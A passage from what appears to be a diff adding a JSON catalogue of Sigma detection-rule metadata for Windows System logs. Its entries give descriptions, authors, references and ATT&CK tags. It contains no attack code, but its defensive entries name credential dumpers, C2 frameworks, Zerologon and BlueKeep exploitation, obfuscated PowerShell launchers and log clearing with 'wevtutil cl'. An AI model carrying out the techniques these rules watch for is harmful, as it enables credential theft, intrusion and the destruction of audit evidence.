"logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_stdin_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "487c7524-f892-4054-b263-8a0ace63fc25", + "value": "Invoke-Obfuscation Via Stdin - System" + }, + { + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "meta": { + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "creation_date": "2019/10/26", + "falsepositive": [ + "Highly unlikely" + ], + "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" + ] + }, + "uuid": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", + "value": "Meterpreter or Cobalt Strike Getsystem Service Installation - System" + }, + { + "description": "Detects a service installation that uses a suspicious double ampersand used in the image path value", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/07/05", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_service_install_susp_double_ampersand.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_susp_double_ampersand.yml" + ], + "tags": 
[ + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", + "value": "New Service Uses Double Ampersand in Path" + }, + { + "description": "Detects Windows Pcap driver installation based on a list of associated .sys files.", + "meta": { + "author": "Cian Heasley", + "creation_date": "2020/06/10", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_pcap_drivers.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://ragged-lab.blogspot.com/2020/06/capturing-pcap-driver-installations.html#more", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_pcap_drivers.yml" + ], + "tags": [ + "attack.discovery", + "attack.credential_access", + "attack.t1040" + ] + }, + "uuid": "7b687634-ab20-11ea-bb37-0242ac130002", + "value": "Windows Pcap Drivers" + }, + { + "description": "Detects service installation of different remote access tools software. 
These software are often abused by threat actors to perform", + "meta": { + "author": "Connor Martin, Nasreddine Bencherchali", + "creation_date": "2022/12/23", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_service_install_remote_access_software.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_remote_access_software.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1543.003", + "attack.t1569.002" + ] + }, + "uuid": "1a31b18a-f00c-4061-9900-f735b96c99fc", + "value": "Remote Access Tool Services Have Been Installed - System" + }, + { + "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/11/09", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_kdcsvc_rc4_downgrade.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://support.microsoft.com/en-us/topic/kb5021131-how-to-manage-the-kerberos-protocol-changes-related-to-cve-2022-37966-fd837ac3-cdec-4e76-a6ec-86e67501407d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_kdcsvc_rc4_downgrade.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "e6f81941-b1cd-4766-87db-9fc156f658ee", + "value": "KDC RC4-HMAC Downgrade CVE-2022-37966" + }, + { + "description": "Detects the installation of the anydesk software service. 
Which could be an indication of anydesk abuse if you the software isn't already used.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/11", + "falsepositive": [ + "Legitimate usage of the anydesk tool" + ], + "filename": "win_system_service_install_anydesk.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_anydesk.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "530a6faa-ff3d-4022-b315-50828e77eef5", + "value": "Anydesk Remote Access Software Service Installation" + }, + { + "description": "Detects PDQDeploy service installation on the target system.\nWhen a package is deployed via PDQDeploy it installs a remote service on the target machine with the name \"PDQDeployRunner-X\" where \"X\" is an integer starting from 1\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/22", + "falsepositive": [ + "Legitimate use of the tool" + ], + "filename": "win_system_service_install_pdqdeploy_runner.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_pdqdeploy_runner.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "b98a10af-1e1e-44a7-bab2-4cc026917648", + "value": "New PDQDeploy Service - Client Side" + }, + { + "description": "Windows Update get some error Check if need a 0-days KB", + "meta": { + "author": "frack113", + "creation_date": "2021/12/04", + "falsepositive": [ + "Unknown" + ], + "filename": 
"win_system_susp_system_update_error.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_system_update_error.yml" + ], + "tags": [ + "attack.impact", + "attack.resource_development", + "attack.t1584" + ] + }, + "uuid": "13cfeb75-9e33-4d04-b0f7-ab8faaa95a59", + "value": "Windows Update Error" + }, + { + "description": "Detects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious services", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/08", + "falsepositive": [ + "Software installation", + "Software updates" + ], + "filename": "win_system_rare_service_installs.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_rare_service_installs.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" + ] + }, + "uuid": "66bfef30-22a5-4fcd-ad44-8d81e60922ae", + "value": "Rare Service Installations" + }, + { + "description": "Detects PAExec service installation", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/26", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_service_install_paexec.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.poweradmin.com/paexec/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_paexec.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "de7ce410-b3fb-4e8a-b38c-3b999e2c3420", + "value": "PAExec Service Installation" + }, + { + "description": 
"Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_via_rundll_services.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_rundll_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "11b52f18-aaec-4d60-9143-5dd8cc4706b9", + "value": "Invoke-Obfuscation RUNDLL LAUNCHER - System" + }, + { + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_use_rundll32_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "641a4bfb-c017-44f7-800c-2aee0184ce9b", + "value": "Invoke-Obfuscation Via Use Rundll32 - System" + }, + { + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_system_service_installation_by_unusal_client.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", 
+ "refs": [ + "https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_system_service_installation_by_unusal_client.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543" + ] + }, + "uuid": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", + "value": "Service Installed By Unusual Client - System" + }, + { + "description": "Detects powershell script installed as a Service", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/06", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_powershell_script_installed_as_service.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_powershell_script_installed_as_service.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", + "value": "PowerShell Scripts Installed as Services" + }, + { + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "meta": { + "author": "Florian Roth, Wojciech Lesicki", + "creation_date": "2021/05/26", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_cobaltstrike_service_installs.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", + "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", + "https://www.sans.org/webcasts/119395", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_cobaltstrike_service_installs.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" + ] + }, + "uuid": "5a105d34-05fc-401e-8553-272b45c1522d", + "value": "CobaltStrike Service Installations - System" + }, + { + "description": "Detects suspicious SAM dump activity as cause by QuarksPwDump and other password dumpers", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/01/27", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_susp_sam_dump.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_sam_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "839dd1e8-eda8-4834-8145-01beeee33acd", + "value": "SAM Dump to AppData" + }, + { + "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", + "meta": { + "author": "Dimitrios Slamaris", + "creation_date": "2017/05/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_susp_dhcp_config.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", + "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", + "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_dhcp_config.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", + "value": "DHCP Server Loaded the CallOut DLL" + }, + { + "description": 
"Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_via_compress_services.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_compress_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "175997c5-803c-4b08-8bb0-70b099f47595", + "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - System" + }, + { + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/21", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_service_install_hacktools.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_hacktools.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ] + }, + "uuid": "d26ce60c-2151-403c-9a42-49420d87b5e4", + "value": "Hacktool Service Registration or Execution" + }, + { + "description": "Detect suspicious error on protocol RDP, potential CVE-2019-0708", + "meta": { + "author": "Lionel PRAT, Christophe BROCAS, @atc_project (improvements)", + "creation_date": "2019/05/24", + "falsepositive": [ + "Bad connections or network interruptions" + ], + "filename": "win_system_rdp_potential_cve_2019_0708.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/zerosum0x0/CVE-2019-0708", + "https://github.com/Ekultek/BlueKeep", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_rdp_potential_cve_2019_0708.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" + ] + }, + "uuid": "aaa5b30d-f418-420b-83a0-299cb6024885", + "value": "Potential RDP Exploit CVE-2019-0708" + }, + { + "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", + "meta": { + "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": "No established falsepositives", + "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://bi-zone.medium.com/hunting-for-zerologon-f65c61586382", + "https://www.secura.com/blog/zero-logon", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" + ], + "tags": [ + "attack.t1210", + "attack.lateral_movement" + ] + }, + "uuid": "18f37338-b9bd-4117-a039-280c81f7a596", + "value": "Zerologon Exploitation Using Well-known Tools" + }, + { + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_stdin_services.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_stdin_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "72862bf2-0eb1-11eb-adc1-0242ac120002", + "value": "Invoke-Obfuscation STDIN+ Launcher - System" + }, + { + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/05/06", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_moriya_rootkit.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_moriya_rootkit.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "25b9c01c-350d-4b95-bed1-836d04a4f324", + "value": "Moriya Rootkit - System" + }, + { + "description": "Detects a Mesh Agent service installation. 
Mesh Agent is used to remotely manage computers", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/11/28", + "falsepositive": [ + "Legitimate use of the tool" + ], + "filename": "win_system_service_install_mesh_agent.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_mesh_agent.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "e0d1ad53-c7eb-48ec-a87a-72393cc6cedc", + "value": "Mesh Agent Service Installation" + }, + { + "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2022/08/25", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_service_install_sliver.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/client/command/commands.go#L1231", + "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_sliver.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1569.002" + ] + }, + "uuid": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", + "value": "Sliver C2 Default Service Installation" + }, + { + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the 
references", + "meta": { + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "creation_date": "2019/11/08", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_obfuscated_iex_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", + "value": "Invoke-Obfuscation Obfuscated IEX Invocation - System" + }, + { + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_var_services.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_var_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "8ca7004b-e620-4ecb-870e-86129b5b8e75", + "value": "Invoke-Obfuscation VAR+ Launcher - System" + }, + { + "description": "Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines.\nPDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/22", + "falsepositive": [ + "Legitimate use of the 
tool" + ], + "filename": "win_system_service_install_pdqdeploy.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_pdqdeploy.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "ee9ca27c-9bd7-4cee-9b01-6e906be7cae3", + "value": "New PDQDeploy Service - Server Side" + }, + { + "description": "Detects the reporting of NTLMv1 being used between a client and server", + "meta": { + "author": "Tim Shelton", + "creation_date": "2022/04/26", + "falsepositive": [ + "Environments that use NTLMv1" + ], + "filename": "win_system_lsasrv_ntlmv1.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/techniques/T1550/002/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_lsasrv_ntlmv1.yml" + ], + "tags": [ + "attack.execution", + "attack.t1550.002", + "attack.s0363" + ] + }, + "uuid": "e9d4ab66-a532-4ef7-a502-66a9e4a34f5d", + "value": "NTLMv1 Logon Between Client and Server" + }, + { + "description": "Detects service installation in suspicious folder appdata", + "meta": { + "author": "pH-T", + "creation_date": "2022/03/18", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_susp_service_installation_folder.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation_folder.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" + ] + }, + "uuid": "5e993621-67d4-488a-b9ae-b420d08b96cb", + "value": 
"Service Installation in Suspicious Folder" + }, + { + "description": "Detects application popup reporting a failure of the Sysmon service", + "meta": { + "author": "Tim Shelton", + "creation_date": "2022/04/26", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_application_sysmon_crash.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_application_sysmon_crash.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ] + }, + "uuid": "4d7f1827-1637-4def-8d8a-fd254f9454df", + "value": "Sysmon Crash" + }, + { + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_via_var_services.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_var_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", + "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System" + }, + { + "description": "Detects the installation of RTCore service. 
Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_susp_rtcore64_service_install.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/br-sn/CheekyBlinder/blob/e1764a8a0e7cda8a3716aefa35799f560686e01c/CheekyBlinder/CheekyBlinder.cpp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_rtcore64_service_install.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", + "value": "RTCore Suspicious Service Installation" + }, + { + "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/01/10", + "falsepositive": [ + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" + ], + "filename": "win_system_eventlog_cleared.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", + "https://twitter.com/deviouspolack/status/832535435960209408", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_eventlog_cleared.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" + ] + }, + "uuid": "a62b37e0-45d3-48d9-a517-90c1a1b0186b", + "value": "Eventlog Cleared" + }, + { + "description": "Detects NetSupport Manager service installation on the target system.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": 
"2022/10/31", + "falsepositive": [ + "Legitimate use of the tool" + ], + "filename": "win_system_service_install_netsupport_manager.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "http://resources.netsupportsoftware.com/resources/manualpdfs/nsm_manual_uk.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_netsupport_manager.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "2d510d8d-912b-45c5-b1df-36faa3d8c3f4", + "value": "NetSupport Manager Service Install" + }, + { + "description": "Detects the \"Windows Defender Threat Protection\" service has been disabled", + "meta": { + "author": "Ján Trenčanský, frack113", + "creation_date": "2020/07/28", + "falsepositive": [ + "Administrator actions", + "Auto updates of Windows Defender causes restarts" + ], + "filename": "win_system_defender_disabled.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_defender_disabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "6c0a7755-6d31-44fa-80e1-133e57752680", + "value": "Windows Defender Threat Detection Disabled - Service" + }, + { + "description": "Detects QuarksPwDump clearing access history in hive", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/05/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml", + "level": "critical", + "logsource.category": "No established category", + 
"logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_quarkspwdump_clearing_hive_access_history.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "39f919f3-980b-4e6f-a975-8af7e507ef2b", + "value": "QuarksPwDump Clearing Access History" + }, + { + "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/27", + "falsepositive": [ + "Unlikely" + ], + "filename": "win_system_susp_proceshacker.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/1kwpeter/status/1397816101455765504", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_proceshacker.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1569.002" + ] + }, + "uuid": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", + "value": "ProcessHacker Privilege Elevation" + }, + { + "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/11/23", + "falsepositive": [ + "Unlikely" + ], + "filename": "win_system_apt_turla_service_png.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_turla_service_png.yml" + ], + "tags": [ + "attack.persistence", + "attack.g0010", + "attack.t1543.003" + ] + }, + "uuid": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", + "value": "Turla PNG Dropper Service" + }, + { + "description": "This the 
